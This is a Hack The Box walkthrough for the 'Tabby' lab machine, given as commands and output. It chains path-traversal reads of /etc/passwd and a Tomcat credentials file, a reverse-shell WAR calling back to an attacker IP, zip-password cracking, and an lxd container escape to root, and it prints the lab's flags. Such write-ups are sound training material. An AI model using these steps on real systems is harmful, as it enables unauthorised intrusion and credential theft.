Tabby
Mon, 07 October 2024
Platform: Hack The Box
sudo nmap 10.10.10.194 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 19:18 BST
Nmap scan report for 10.10.10.194
Host is up (0.043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.24 seconds
curl 10.10.10.194
<div class="main_newsstory text-center">
<p><i class="fa fa-rss"> We have recently upgraded several services. Our servers are now more secure than ever. <a href="http://megahosting.htb/news.php?file=statement">Read our statement on recovering from the data breach</a></i></p>
</div>
<a href="http://megahosting.htb/news.php?file=statement"...
sudo nano /etc/hosts
10.10.10.194 megahosting.htb
curl http://megahosting.htb:8080
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat</title>
</head>
<body>
<h1>It works !</h1>
<p>If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!</p>
<p>This is the default Tomcat home page. It can be found on the local filesystem at: <code>/var/lib/tomcat9/webapps/ROOT/index.html</code></p>
<p>Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with <code>CATALINA_HOME</code> in <code>/usr/share/tomcat9</code> and <code>CATALINA_BASE</code> in <code>/var/lib/tomcat9</code>, following the rules from <code>/usr/share/doc/tomcat9-common/RUNNING.txt.gz</code>.</p>
<p>You might consider installing the following packages, if you haven't already done so:</p>
<p><b>tomcat9-docs</b>: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking <a href="docs/">here</a>.</p>
<p><b>tomcat9-examples</b>: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking <a href="examples/">here</a>.</p>
<p><b>tomcat9-admin</b>: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the <a href="manager/html">manager webapp</a> and the <a href="host-manager/html">host-manager webapp</a>.</p>
<p>NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in <code>/etc/tomcat9/tomcat-users.xml</code>.</p>
</body>
</html>
NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui".
The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.
curl http://megahosting.htb/news.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
Tomcat is installed with CATALINA_HOME in:
/usr/share/tomcat9
Users are defined in:
/etc/tomcat9/tomcat-users.xml
curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat9/tomcat-users.xml
Nothing.
curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
tomcat:$3cureP4s5w0rd123!
http://megahosting.htb:8080/host-manager/html
tomcat:$3cureP4s5w0rd123!
https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Supported_Manager_Commands
Deploy A New Application Archive (WAR) Remotely
http://localhost:8080/manager/text/deploy?path=/foo
msfvenom --list payloads | grep -i jsp
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4435 -f war > shell.war
curl -u 'tomcat:$3cureP4s5w0rd123!' http://megahosting.htb:8080/manager/text/deploy?path=/tmp --upload-file shell.war
OK - Deployed application at context path [/tmp]
nc -lvnp 4435
curl http://megahosting.htb:8080/tmp/
Listening on 0.0.0.0 4435
Connection received on 10.10.10.194 54336
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
bash linpeas.sh | tee o-linpeas
cat o-linpeas | grep -inw 'ash'
647:ash:x:1000:1000:clive:/home/ash:/bin/bash
1493:-rw-r--r-- 1 ash ash 8716 Jun 16 2020 /var/www/html/files/16162020_backup.zip
cat o-linpeas | grep -ine 'backup'
348:# For example, you can run a backup of all your user accounts
350:# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
428:# For example, you can run a backup of all your user accounts
430:# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
671:uid=34(backup) gid=34(backup) groups=34(backup)
1492:╔══════════╣ Backup files (limited 100)
1493:-rw-r--r-- 1 ash ash 8716 Jun 16 2020 /var/www/html/files/16162020_backup.zip
1496:-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
1500:-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-31/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
1501:-rw-r--r-- 1 root root 0 May 7 2020 /usr/src/linux-headers-5.4.0-31-generic/include/config/net/team/mode/activebackup.h
1502:-rw-r--r-- 1 root root 0 May 7 2020 /usr/src/linux-headers-5.4.0-31-generic/include/config/wm831x/backup.h
1504:-rw-r--r-- 1 root root 8161 May 7 2020 /usr/lib/modules/5.4.0-31-generic/kernel/drivers/net/team/team_mode_activebackup.ko
1505:-rw-r--r-- 1 root root 8729 May 7 2020 /usr/lib/modules/5.4.0-31-generic/kernel/drivers/power/supply/wm831x_backup.ko
1506:-rw-r--r-- 1 root root 43888 Mar 9 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
1548:╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
locate 2john | grep -ine 'zip'
110:/usr/sbin/zip2john
cd /var/www/html/files
ls
16162020_backup.zip archive revoked_certs statement
python3 -m http.server 88 &
[1] 66252
Serving HTTP on 0.0.0.0 port 88 (http://0.0.0.0:88/) ...
http://10.10.10.194:88/
Directory listing for /
16162020_backup.zip
archive/
revoked_certs/
statement
zip2john 16162020_backup.zip
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: TS_chk, cmplen=338, decmplen=766, crc=282B6DE2 ts=7DB5 cs=7db5 type=8
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6 ts=5935 cs=5935 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: TS_chk, cmplen=2906, decmplen=2894, crc=02F9F45F ts=5D46 cs=5d46 type=0
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: TS_chk, cmplen=114, decmplen=123, crc=5C67F19E ts=5A7A cs=5a7a type=8
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3 ts=6A8B cs=6a8b type=8
16162020_backup.zip:$pkzip$5*1*1*0*8*24*7db5*dd84cfff4c26e855919708e34b3a32adc4d5c1a0f2a24b1e59be93f3641b254fde4da84c*1*0*8*24*6a8b*32010e3d24c744ea56561bbf91c0d4e22f9a300fcf01562f6fcf5c986924e5a6f6138334*1*0*0*24*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip$::16162020_backup.zip:var/www/html/news.php, var/www/html/favicon.ico, var/www/html/Readme.txt, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
echo '$pkzip$5*1*1*0*8*24*7db5*dd84cfff4c26e855919708e34b3a32adc4d5c1a0f2a24b1e59be93f3641b254fde4da84c*1*0*8*24*6a8b*32010e3d24c744ea56561bbf91c0d4e22f9a300fcf01562f6fcf5c986924e5a6f6138334*1*0*0*24*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip$' > hashes
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (?)
1g 0:00:00:00 DONE (2024-10-06 22:44) 1.587g/s 16462Kp/s 16462Kc/s 16462KC/s adonisbrizo..adamneil17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ash:admin@it
su ash
Password: admin@it
ash@tabby:/var/www/html/files$
cat user.txt
df85a736758771f1395ad9f0a328188c
bash linpeas.sh | tee o-linpeas-ash
cat o-linpeas-ash | grep 'lxd'
User & Groups: uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
/var/snap/lxd/common/lxd/unix.socket
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
uid=998(lxd) gid=100(users) groups=100(users)
git clone https://github.com/saghul/lxd-alpine-builder.git .git/lxd
cd .git/lxd
FILENAME=alpine-v3.13-x86_64-20210218_0139.tar.gz && cp "$FILENAME" /tmp/ && python3 -m http.server -d /tmp 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
curl 10.10.16.7:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz -O
10.10.10.194 - - [07/Oct/2024 00:25:51] "GET /alpine-v3.13-x86_64-20210218_0139.tar.gz HTTP/1.1" 200 -
/snap/bin/lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias alpine
/snap/bin/lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| alpine | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | CONTAINER | 3.11MB | Oct 6, 2024 at 11:29pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
/snap/bin/lxd init
[...] Keep pressing enter to continue with defaults...
/snap/bin/lxc init alpine privesc -c security.privileged=true
Creating privesc
/snap/bin/lxc config device add privesc rootfs disk source=/ path=/lxd recursive=true
Device rootfs added to privesc
/snap/bin/lxc start privesc
/snap/bin/lxc exec privesc /bin/sh
id
uid=0(root) gid=0(root)
cat /lxd/root/root.txt
126560f3dddac7cdbaf8ee8bf7030341